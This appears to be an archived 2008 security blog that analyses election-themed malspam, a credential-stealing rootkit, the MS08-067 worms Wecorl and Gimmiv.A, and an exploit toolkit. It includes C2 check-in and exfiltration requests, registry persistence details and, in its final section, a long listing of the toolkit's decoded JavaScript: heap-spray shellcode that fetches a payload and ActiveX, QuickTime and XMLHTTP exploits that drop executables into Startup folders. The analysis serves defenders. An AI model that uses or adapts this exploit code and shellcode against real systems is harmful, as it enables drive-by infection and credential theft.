Subject: A new president, a new congress...
Barack Obama Elected 44th President of United States Barack Obama, unknown to most Americans just four years ago, will become the 44th president and the first African-American president of the United States.
Watch His amazing speech at November 5! ...... "

On 7 November 2008, it was McCain’s turn to be center stage on the malspam front. The following is a sample email with a hyperlink to a fake news website.

From: USA news []
Sent: Friday, November 07, 2008 10:53 AM
Subject: McCain want to stop Obama

McCain Lawyer Impeach Obama!
McCain has reached an agreement with the Obama lawyers that makes Obama resignation effective November 11.
Barack Obama can lost President's Chair.
McCain video report 7 November:

Proceed to the election results news page>> <> 2008 USA Government Official Web Site.

Sample malspam email subjects include:

McCain Lawyers Want to Stop Obama
Barack Obama in Danger - McCain will fight for president post
McCain Lawmakers Impeach Obama
McCain said today: 'Impeach Obama'
Obama Impeachment Resources: McCain Look at the Impeachment Process ...
Obama faces impeachment
The Impeachment of new president Obama
IMPEACH Barrack Obama | USA government news
Scandal: Obama Resignation Letter
Video: Obama post-resignation speech
Barack Obama can lost President's Chair. The President's Resignation.
Barack Obama can lost presidents chair.The President's Resignation Speech - TIME
Barack Obama president resignation - 23/7 News
Barack Obama can lost President's Chair. Political Strike at WV Mine
Barack Obama can lost President's Chair. Political Strike Confronts the Global Economy
Barack Obama can lost President's Chair.POLITICAL STRIKE TIES
McCain strike against Obama political way
Obama vs McCain 'Political Strike' May Undermine Labor Group
McCain vs Obama - There is a higher potential for confrontation between opposing political forces
McCain want to stop Obama
Why MccAin Want to Stop Obama From president vacancy?
Scandal: Re-elections McCain will win
Scandal: Re-elections Obama: McCain Will Close With Attacks
WScandal: Re-elections hich John McCain will show up to debate?
Scandal: Re-elections Why John McCain will keep fighting
Scandal: Re-elections John McCain Will be a Dictator?
Scandal: Re-elections Why McCain Will Win
Scandal: Re-elections John McCain will defeat Barack Obama

Sample malspam email From field values include:

USA Government Center
USA news
CNN news
McCain News Center
Elections Centre
Election News

Sample malspam email From spoofed addresses include:

The malspam hyperlinks point to fast-flux hosted domains.

The domains mapped to the following fast-flux IP addresses at the time of analysis.

IP Reverse Country JP US US IL TW

The hyperlinks point to a website that advertises a McCain video and hyperlinks to get the Adobe Flash Media Player.

The site uses several methods to trick victims into downloading AdobePlayer9.exe: an automatic meta refresh and image links that all resolve to the same executable.

<meta http-equiv="REFRESH" content="10;url=../AdobePlayer9.exe">

<a href="AdobePlayer9.exe"><img border="0" src="160x41_Get_media_Player.jpg" width="160" height="41"></a>

<a href="AdobePlayer9.exe">
<img border="0" src="McCainvideo.jpg" width="582" height="402" onclick="alert1()" onMouseOver="window.status='';
return true" onMouseOut="window.status=''; return true" TARGET="_top"></a>

Malware Analysis

25,173 bytes

AdobePlayer9.exe creates C:\WINDOWS\9129837.exe

25,173 bytes

9129837.exe creates C:\WINDOWS\new_drv.sys

8,192 bytes

The following registry keys store malware identification data.

HKEY_CURRENT_USER\Software\Microsoft\InetData "Data"
Data: 28, 00, 00, 00, 00, A5, 01, DB, 00, 00, F1, 0C, 65, 30
HKEY_CURRENT_USER\Software\Microsoft\InetData "k1"
Data: 50, FF, F4, 94
HKEY_CURRENT_USER\Software\Microsoft\InetData "k2"
Data: B8, 72, F7, 4E
HKEY_CURRENT_USER\Software\Microsoft\InetData "version"
Type: REG_SZ
Data: 2

The following registry keys install new_drv.sys as a service. The Type value 01 (SERVICE_KERNEL_DRIVER) and Start value 03 (SERVICE_DEMAND_START) register it as a kernel-mode driver that is loaded on demand.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "DisplayName"
Type: REG_SZ
Data: !!!!
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ErrorControl"
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ImagePath"
Data: \??\C:\WINDOWS\new_drv.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Start"
Data: 03, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Type"
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_NEW_DRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "Count"
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "NextInstance"
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Security "Security"

The following hidden registry key launches 9129837.exe at startup

ttool = C:\WINDOWS\9129837.exe

Together, 9129837.exe and new_drv.sys function as a rootkit: the malware's files, registry keys, and processes are hidden from the system.

>SSDT State
Actual Address 0x81C1F58A
Hooked by: Unknown module filename

Actual Address 0x81C1F6B6
Hooked by: Unknown module filename

Actual Address 0x81C1F85C
Hooked by: Unknown module filename

!!!!!!!!!!!Hidden process: C:\WINDOWS\9129837.exe
Process Id: 596
EPROCESS Address: 0x81C9D9F8

Suspect File: C:\WINDOWS\9129837.exe Status: Hidden
Suspect File: C:\WINDOWS\new_drv.sys Status: Hidden

The malware hooks into any running process; the following example shows the hooks found in svchost.exe (PID 1056). The hooked APIs — CreateProcessA/W and the WinInet send/read functions — are consistent with intercepting process creation and HTTP traffic inside the hooked process.

[1056]svchost.exe-->kernel32.dll-->CreateProcessA, Type: Inline - RelativeJump at address 0x77E61BBC hook handler located in [unknown_code_page]
[1056]svchost.exe-->kernel32.dll-->CreateProcessW, Type: Inline - RelativeJump at address 0x77E61B8E hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->HttpSendRequestA, Type: Inline - RelativeJump at address 0x76210689 hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->HttpSendRequestW, Type: Inline - RelativeJump at address 0x7622B059 hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetCloseHandle, Type: Inline - RelativeJump at address 0x7620974B hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetQueryDataAvailable, Type: Inline - RelativeJump at address 0x7620FC5E hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetReadFile, Type: Inline - RelativeJump at address 0x7620FA3C hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetReadFileExA, Type: Inline - RelativeJump at address 0x7622571D hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetReadFileExW, Type: Inline - RelativeJump at address 0x76240C8A hook handler located in [unknown_code_page]

9129837.exe listens on TCP port 13899 and runs as a hidden process. The same port number appears as the socks parameter in the C2 check-in requests below, which suggests the listener is a SOCKS proxy.

Process C:\WINDOWS\9129837.exe (*** hidden ***)

Protocol Local Address Foreign Address State PID PathName
TCP : 13899 : 0 LISTENING 596 C:\WINDOWS\9129837.exe
UDP : 1037 * : * 596 C:\WINDOWS\9129837.exe
RAW --- --- --- 596 C:\WINDOWS\9129837.exe

9129837.exe connects to (UA) to register itself, receive instructions, and exfiltrate data. The following requests were observed:

POST /cgi-bin/pstore.cgi
GET /cgi-bin/cmd.cgi
GET /cgi-bin/options.cgi
POST /cgi-bin/cert.cgi

POST /cgi-bin/pstore.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------dbe3fdbe3fdbe3f
User-Agent: IE
Content-Length: 224
Cache-Control: no-cache

Content-Disposition: form-data; name="upload_file"; filename="2499084112.2"
Content-Type: application/octet-stream

GET /cgi-bin/cmd.cgi?user_id=2499084112&version_id=2&passphrase=fkjvhsdvlksdhvlsd&socks=13899&version=125&crc=00000000 HTTP/1.1

GET /cgi-bin/options.cgi?user_id=2499084112&version_id=2&passphrase=fkjvhsdvlksdhvlsd&socks=13899&version=125&crc=00000000 HTTP/1.1

POST /cgi-bin/cert.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------dcd05dcd05dcd05
User-Agent: IE
Content-Length: 298
Cache-Control: no-cache

Content-Disposition: form-data; name="upload_file"; filename="2499084112.2"
Content-Type: application/octet-stream

0S...0...*.H.. .......0.0;0.0...+............2........&..........N...+..\.......{....

MS08-067 and W32.Wecorl

On 2 November 2008, Symantec reported a “worm” called W32.Wecorl that attempted to exploit the Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability (MS08-067). The following provides analysis for the W32.Wecorl malware variant 10wrjcenew.exe.

In a lab test, the malware 10wrjcenew.exe:

Created C:\DOCUME~1\%user profile%\LOCALS~1\Temp\Install.2008.dat
Deleted C:\WINDOWS\System32\Dllcache\Svchost.exe
Modified C:\WINDOWS\System32\Svchost.exe
Created C:\WINDOWS\system32\7DBF6DA4

The following registry keys were created:

Data: (data too large: 3584 bytes)

The malware proceeded to download mimi.1268772 from (, CN) and pp.gif from (, US)

GET /mimi.1268772 HTTP/1.1

GET /u/f/o/ufo2000sgd/pp.gif HTTP/1.1

The malware attempted an MS08-067 buffer overflow exploit against 121.x.x.x, UDP port 137. The captured packet appears to be a NetBIOS node status query (the encoded wildcard name `CKAAAA…` with query type 0x21), which is consistent with the host-discovery step that precedes the exploit rather than the overflow itself.

0000 00 0f 66 5e 0e 78 00 0c 29 ec 1c 43 08 00 45 00 ..f^.x..)..C..E.
0010 00 4e 01 02 00 00 80 11 53 af c0 a8 00 0d 79 0c .N......S.....y.
0020 ac 2c 00 89 00 89 00 3a 5a 2d 80 13 00 00 00 01 .,.....:Z-......
0030 00 00 00 00 00 00 20 43 4b 41 41 41 41 41 41 41 ...... CKAAAAAAA
0040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0050 41 41 41 41 41 41 41 00 00 21 00 01 AAAAAAA..!..

The malware connects to (, CN) ClientReg.aspx and ClientTask.aspx to register the malware and receive C2 instructions. The sample connection shows a download request for

GET /ClientReg.aspx?mac=xx:xx:xx:xx:xx:xx&Type=0&Sn=081026 HTTP/1.1

HTTP/1.1 200 OK

xxyysign xxyyMyIP=xx.xx.xx.xx

GET /ClientTask.aspx?mac= xx:xx:xx:xx:xx:xx &Type=0&Sn=081026 HTTP/1.1

HTTP/1.1 200 OK


The following files were observed during analysis:

10752 f01fd7ecfce8af65832a3a57d2789fa6 10wrjcenew.exe
12800 0f7d9c87b0ce1fa520473119752c6f79 3EDFB6D2
900 14c9db2b8177ca199f283e644fcda225 mimi.1268772
404992 0fdb364e8666140d4570d24f363d26d5 nb1103.exe
258048 944b1a83ee17db7fa779a2e7d970768c pp.gif

Thursday, November 6, 2008

MS08-067 and Trojan.Gimmiv.A

On 24 October 2008, Microsoft released an out-of-cycle patch that addressed a stack buffer overflow vulnerability in the Microsoft Windows Server service (MS08-067, CVE-2008-4250). Per Microsoft, "This security update resolves a privately reported vulnerability in the Server service. The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code. It is possible that this vulnerability could be used in the crafting of a wormable exploit."

Public exploit code and malware began circulating as soon as the patch was released. Microsoft and Symantec provided analysis on malware known as Gimmiv.A. The malware harvests and exfiltrates system information and is able to scan and exploit the MS08-067 vulnerability. The following provides analysis findings for Gimmiv.A.

Site (JP) was found to host nine Gimmiv.A binaries, n*1-9.


dc3fdfde66fffb6cfbec946a237787d8 397312
f173007fbd8e2190af3be7837acd70a4 397312
3ee354cc8b63b8849b28e6f376f2b263 397312
6c3e53864541bb13fa7853f7b580b807 397312
24cd978da62cff8370b83c26e134ff4c 397312
86d75ae361637a8f9114bb3a40f710d3 397312
ee70f981514803e1fb4e6b65f492a56d 397312
8d66f28d028a4838d09ce4b91d35b7cb 397312
477aac8d472a7bea8b906718a2f50c67 397312

The malware n2.exe was analyzed as an example.

n2.exe creates c:\WINDOWS\system32\wbem\sysmgr.dll

336384 bytes

The following registry keys are created to install the malware as a service. The SvcHost group entry together with the ImagePath (svchost.exe -k sysmgr) and ServiceDll values causes sysmgr.dll to be loaded inside a svchost.exe instance rather than run as a standalone process.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost
"sysmgr" = sysmgr
"DisplayName" = System Maintenance Service
"ErrorControl" = 0
"ImagePath" = %SystemRoot%\System32\svchost.exe -k sysmgr
"ObjectName" = LocalSystem
"Start" = 2
"Type" = 10, 01, 00, 00


"0" = Root\LEGACY_SYSMGR\0000
"Count" = 1
"NextInstance" = 1
"ServiceDll" = C:\WINDOWS\System32\wbem\sysmgr.dll
"ServiceMain" = ServiceMainFunc
"Security" = binary data

The malware searches the registry for installed antivirus products and scans the running processes for avp.exe and dwm.exe.

0002549C 1002549C 0 SOFTWARE\BitDefender
000254B4 100254B4 0 avp.exe
000254BC 100254BC 0 SOFTWARE\Jiangmin
000254D8 100254D8 0 SOFTWARE\KasperskyLab
000254F0 100254F0 0 SOFTWARE\Kingsoft
00025504 10025504 0 SOFTWARE\Symantec\PatchInst\NIS
00025524 10025524 0 SOFTWARE\Microsoft\OneCare Protection
0002554C 1002554C 0 SOFTWARE\rising
0002555C 1002555C 0 SOFTWARE\TrendMicro
00025574 10025574 0 dwm.exe

The malware sysmgr.dll sends ICMP Echo requests to and An Echo reply was returned from

Source Destination Protocol Info ICMP Echo (ping) request ICMP Echo (ping) request ICMP Echo (ping) reply

The ICMP packet contains a string of characters abcde12345fghij6789.

0000 00 0f 66 5e 0e 78 00 0c 29 ec 1c 43 08 00 45 00 ..f^.x..)..C..E.
0010 00 30 00 81 00 00 80 01 98 fe c0 a8 00 0d ca 6c .0.............l
0020 16 2c 08 00 ba 5f 02 00 02 00 61 62 63 64 65 31 .,..._....abcde1
0030 32 33 34 35 66 67 68 69 6a 36 37 38 39 00 23 45 fghij6789.

The binary strings of sysmgr.dll reveal the ICMP string and a third IP

00039018 00439018 0 abcde12345fghij6789
00039030 00439030 0
00039070 00439070 0
00039090 00439090 0 (CN)
Reverse lookup (US)
Reverse lookup (DE)
Reverse lookup

The malware captures host information such as IP address and hostname, as well as credentials from Outlook Express, the Credential Manager, and Protected Storage. The strings CredEnumerate and PStoreCreateInstance below are the Windows API entry points used to enumerate these stores.

00025E04 10025E04 0 Username
00025E10 10025E10 0 82BD0E67-9FEA-4748-8672-D5EFE5B779B0
00025E38 10025E38 0 Advapi32.dll
00025E48 10025E48 0 CredEnumerate
00025E58 10025E58 0 CredFree
00025E64 10025E64 0 Passport.Net\*
00025E74 10025E74 0 pstorec.dll
00025E80 10025E80 0 PStoreCreateInstance
00025E9C 10025E9C 0 89c39569
00025EA8 10025EA8 0 5e7e8100
00025EB4 10025EB4 0 e161255a
00025EC8 10025EC8 0 StringIndex
00025ED4 10025ED4 0 :String
00025EDC 10025EDC 0 :String
00025EE4 10025EE4 0 http:/
00025EEC 10025EEC 0 https:/
00025EF8 10025EF8 0 ===============Outlook Express===============
00025F28 10025F28 0 ===============Credential Info================
00025F58 10025F58 0 ============Protected Storage Info=============
00025F94 10025F94 0 Pass:
00025F9C 10025F9C 0 URL:
00025FA8 10025FA8 0 GetWebInfo
00025FB4 10025FB4 0 <%s %d> !!! Web ID/Pass Info ERR
00025FE7 10025FE7 0 ksysmgr

The malware exfiltrates the captured information to[num]?def=[num]. The abc value represents the installed antivirus version and the def value represents the OS version. The exfiltrated data is encrypted with AES.

00025638 10025638 0 ?abc=1
00025648 10025648 0 ?abc=3
00025658 10025658 0 ?abc=4
00025668 10025668 0 ?abc=5
00025678 10025678 0 ?abc=6
00025688 10025688 0 ?abc=7
00025698 10025698 0 ?abc=8
000256A8 100256A8 0 ?abc=9
000256B8 100256B8 0 ?abc=2
000256C8 100256C8 0 ?def=2
000256D8 100256D8 0 ?def=3
000256E8 100256E8 0 ?def=1
000256F8 100256F8 0 ?def=4
00025708 10025708 0 ?def=5

Gimmiv.A attempts to connect to the remote IP address to download a CAB file to %System%\ From the CAB file, the trojan extracts the following files:


311296 82ba009746da8603c463f37e381a42a4 basesvc.dll
200704 60d692fd52098f145e448bd985fcff6d syicon.dll
49152 40cb861ad59c804f340fd8a2a28e226c winbase.dll

The additional DLLs provide the scanning and exploitation functionality for the MS08-067 vulnerability.

Tuesday, September 30, 2008

Exploit Toolkit Expansion

Automated exploit toolkits such as MPack, Neosploit, and various knockoffs continue to add exploits targeting a wide variety of vulnerabilities in Microsoft Internet Explorer, Microsoft Office, Firefox, and third-party plug-ins and applications (Flash, Adobe Acrobat Reader, WinZip, media players, etc.). The following exploit toolkit sample targeted 17 vulnerabilities.

Exploit Code Analysis:

A compromised website contained an iframe that redirected to http[:]// The site contained an iframe that redirected to http[:]// The index.php page returned obfuscated JavaScript that decoded to reveal exploits targeted against the following vulnerabilities.

MDAC RDS.Dataspace ActiveX Control Vulnerability - CVE-2006-0003 - MS06-014

Microsoft Windows WebViewFolderIcon ActiveX integer overflow - CVE-2006-3730 - MS06-057

Microsoft Access Snapshot Viewer ActiveX Control Vulnerability - CVE-2008-2463 - MS08-041

Heap-based buffer overflow in DirectAnimation.PathControl COM object - CVE-2006-4446 - MS06-067

COM Object Instantiation Memory Corruption Vulnerability - CVE-2005-2127 - MS05-052

Microsoft Works ActiveX Control Remote Code Execution - CVE-2007-5348 - MS08-052

Ourgame GLWorld GLIEDown2.dll ActiveX Control Vulnerability

CA Products DSM ListCtrl ActiveX Control Code Execution Vulnerability - CVE-2008-1472

Adobe Reader and Acrobat Multiple Stack-based Buffer Overflow Vulnerabilities - CVE-2007-5659

America Online SuperBuddy ActiveX Control Code Execution Vulnerability - CVE-2006-5820

GOM Player GOM Manager ActiveX Control Buffer Overflow - CVE-2007-5779

Microsoft XML Core Services XMLHTTP ActiveX Control Vulnerability - CVE-2006-5745 - MS06-071

Apple QuickTime RTSP Content-Type header stack buffer overflow - CVE-2007-6166

RealNetworks RealPlayer ActiveX controls property heap memory corruption - CVE-2008-1309

Online Media Technologies NCTsoft NCTAudioFile2 ActiveX buffer overflow - CVE-2007-0018

Creative Software AutoUpdate Engine ActiveX stack buffer overflow - CVE-2008-0955

Sina DLoader Class ActiveX Control 'DonwloadAndInstall' Method Arbitrary File Download Vulnerability

Index.php Exploit Code:

var url="http[:]//";
var m=new Array();
var mf=0;
function hex(num,width){
var digits="0123456789ABCDEF";
var hex=digits.substr(num&0xF,1);
var width=(width?width:0);
return hex;
function addr(addr){
return unescape("%u"+hex(addr&0xFFFF,4)+"%u"+hex((addr>>16)&0xFFFF,4));
function unes(str){
var tmp="";
for(var i=0;i<str.length;i+=4){
return unescape(tmp);
function hav(){
function gss(ss,sss){
return ss;
function ms(){
var plc=unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u352F%u2E39%u3231%u2E35%u3232%u2E39%u3137%u652F%u2F78%u2F37%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3334%u3636%u7326%u6C70%u353D");
if (mf)return(0);
var hsta=0x0c0c0c0c,hbs=0x100000,pl=plc.length*2,sss=hbs-(pl+0x38);
var ss=gss(addr(hsta),sss),hb=(hsta-hbs)/hbs;
function cobj(obj){
var ret=null;
var clsid=obj.substring(1,obj.length-1);
return ret;
return null;
ret=new ActiveXObject(obj);
return ret;
return null;
var padding = "AAAA";
var heapBase = 0x00150000;
var memo;
function init(maxAlloc){
while (4 + padding.length*2 + 2 < 65535)padding += padding;
memo = new Array();
function flush(){
delete memo["plunger"];
memo["plunger"] = new Array();
var bytes = new Array(32, 64, 256, 32768);
for (var i = 0; i < 6; i++) {
for(var n = 0; n < 4; n++) {
var len = memo["plunger"].length;
eval("memo[\"plunger\"][len] = padding.substr(0, (" + bytes[n] + "-6)/2);");
function alloc(arg, tag){
var size;
size = arg;
if (size == 32 || size == 64 || size == 256 || size == 32768) {}
if ( ! memo[tag] )memo[tag] = new Array();
var len = memo[tag].length;
memo[tag][len] = padding.substr(0, (arg-6)/2);
function alloc_str(arg, tag){
var size;
size = 4 + arg.length*2 + 2;
if (size == 32 || size == 64 || size == 256 || size == 32768) {}
if ( ! memo[tag])memo[tag] = new Array();
var len = memo[tag].length;
memo[tag][len] = arg.substr(0, arg.length);
function free(tag) {
delete memo[tag];
function CreateO(o,n){
var r=null;
function Go(a){
var eurl=url+"&spl=1";
var fname="winbQB0sCA.exe";
var fso=CreateO(a,"Scripting.FileSystemObject")
var sap=CreateO(a,"Shell.Application");
var x=CreateO(a,"ADODB.Stream");
var nl=null;
catch(e){try{nl=new XMLHttpRequest();"GET",eurl,false);}
catch(e){return 0;}}}}
return 1;
function mdac() {
var i=0;
var target=new Array(
var a=null;
if(a){try{var b=CreateO(a,"Shell.Application");if(b){Go(a);}}catch(e){}}
return 0;
function wfi() {
for(var i=0;i<128;i++){
var wvfio=new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1");
var wvfit=new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1");
return 0;
function com() {
return 0;
function dani() {
var jmpecx = 0x0c0c0c0c;
var vtable = addr(0x7ceb9090);
for (var i = 0; i < 124/4; i++)vtable += addr(jmpecx);
vtable += padding.substr(0, (1008-138)/2);
var fakeObjPtr = heapBase + 0x688 + ((1008+8)/8)*48;
var fakeObjChunk = padding.substr(0, (0x200c-4)/2) + addr(fakeObjPtr) + padding.substr(0, 14/2);
for (var i = 0; i < 100; i++)alloc_str(vtable);
alloc_str(vtable, "lookaside");
for (var i = 0; i < 100; i++)alloc(0x2010);
for (var i = 0; i < 2; i++) {
alloc_str(fakeObjChunk, "freeList");
obj.KeyFrame(0x40000801, new Array(1), new Array(1));
return 0;
function office(){
var dir=new Array(
"C:\Documents and Settings\All Users\Start Menu\Programs\StartUp\office.exe",
"C:\Documents and Settings\All Users\Menu Iniciar\Programas\Iniciar\office.exe",
"C:\Documents and Settings\All Users\Menu Inicio\Programas\Inicio\office.exe",
"C:\Documents and Settings\All Users\Kuynnistu-valikko\Ohjelmat\Kuynnistys\office.exe",
"C:\Documents and Settings\All Users\Menu Dumarrer\Programmes\Dumarrage\office.exe",
"C:\Documents and Settings\All Users\Menuen Start\Programmer\Start\office.exe",
"C:\Documents and Settings\All Users\Menu Start\Programma's\Opstarten\office.exe",
"C:\Documents and Settings\All Users\Start Menu\Programlar\BASLANGI\office.exe",
"C:\Documents and Settings\All Users\Menu Start\Programy\Autostart\office.exe",
"C:\Documents and Settings\All Users\Start-meny\Programmer\Oppstart\office.exe",
"C:\Documents and Settings\All Users\Start-menyn\Program\Autostart\office.exe",
"C:\Documents and Settings\All Users\Menu Avvio\Programmi\Esecuzione automatica\office.exe",
"C:\Dokumente und Einstellungen\All Users\Startmenu\Programme\Autostart\office.exe");
var obj=null;
obj=cobj("snpvw.Snapshot Viewer Control.1");
if (obj){
obj.Zoom = 0;
obj.ShowNavigationButtons = false;
obj.AllowContextMenu = false;
obj.SnapshotPath = url+"&opr=1";
obj.CompressedPath = dir[j];
return 0;
function dl(){
var obj=null;
if (obj){
return 0;
function wks(){
var obj=null;
var num = 202116108;
obj.WksPictureInterface = num;
return 0;
function ogame(){
var obj=null;
var buf = "";
while (buf.length < 600) buf += "\x0c\x0c\x0c\x0c";
return 0;
function ca(){
var obj=null;
if (obj.AddColumn) {
var buf = addr(0x0c0c0c0c);
while(buf.length < 128)buf += buf;
buf = buf.substring(0, 128);
return 0;
function buddy(){
try {
var obj=null;
obj = cobj("Sb.SuperBuddy");
if (obj) {
} catch(e){}
return 0;
function gomweb(){
try {
var obj=null;
obj = cobj("GomWebCtrl.GomManager.1");
if (obj) {
var buf="AAAA";
while (buf.length < 506) buf += buf;
buf = buf.substring(0,506);
buf += addr(0x0c0c0c0c);
} catch(e){}
return 0;
function xmlcore(){
try {
var xml = null;
var xml = cobj("Msxml2.XMLHTTP.6.0");
if (xml){
xml = cobj("Msxml2.XMLHTTP.4.0");
if(!xml)return 0;
var obj=null;
obj = cobj("{88d969c5-f192-11d4-a65f-0040963251e5}");
obj = obj.object
if(obj) {
try { Array(),new Array(),new Array(),new Array(),new Array());} catch(e) {}; Object(),new Object(),new Object(),new Object(),new Object());
obj.setRequestHeader(new Object(),"...");
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
} catch(e){}
return 0;
function quick(){
try {
var obj=null;
obj = cobj("QuickTime.QuickTime.4");
if (obj) {
var buf = "";
for(var i=0;i<200;i++) {
buf += "AAAA";
buf += "AAA";
for(var i=0;i<3;i++)buf += "\x0c\x0c\x0c\x0c";
var my_div = document.createElement("div");
my_div.innerHTML =
"<object classid=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\" width=\"200\" height=\"200\">" +
"<param name=\"src\" value=\"object_rtsp\">" +
"<param name=\"type\" value=\"image/x-quicktime\">" +
"<param name=\"autoplay\" value=\"true\">" +
"<param name=\"qtnext1\" value=\"<rtsp://BBBB:"+buf+">T<myself>\">" +
"<param name=\"target\" value=\"myself\">" +

} catch(e) {}
return 0;
function real(){
try {
var obj=null;
obj = cobj("IERPCtl.IERPCtl.1");
if (obj) {
if(obj.PlayerProperty("PRODUCTVERSION")>"") {
obj = cobj("{2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93}");
var m = "";
var buf = addr(0x0c0c0c0c);
while (buf.length < 32) buf += buf;
buf = buf.substring(0,32);
m = obj.Console;
obj.Console = buf;
obj.Console = m;
m = obj.Console;
obj.Console = buf;
obj.Console = m;
} catch(e){}
return 0;
function ntaudio(){
var obj=null;
var buf = addr(0x0c0c0c0c);
while (buf.length < 5200) buf += buf;
buf = buf.substring(0,5200);
return 0;
function creative(){
var obj=null;
var buf = addr(0x09090909);
while (buf.length < 512) buf += buf;
buf = buf.substring(0,512);
obj.cachefolder = buf;
return 0;

function pdf(){
try {
var vers = new Array(0,0,0);
var ver = "0";
var obj = null;
obj = cobj("AcroPDF.PDF");
if (!obj){
obj = cobj("PDF.PdfCtrl");

if (obj) {
var my_div = document.createElement("div");
my_div.innerHTML = "<iframe src=\"http[:]//\" width=100 height=100 style=\"display:none\"></iframe>";
} catch(e){}
return 0;

if (
mdac() ||
office() ||
dl() ||
pdf() ||
wfi() ||
com() ||
creative() ||
wks() ||
ogame() ||
ca() ||
buddy() ||
gomweb() ||
xmlcore() ||
quick() ||
real() ||
|| dani()
) {}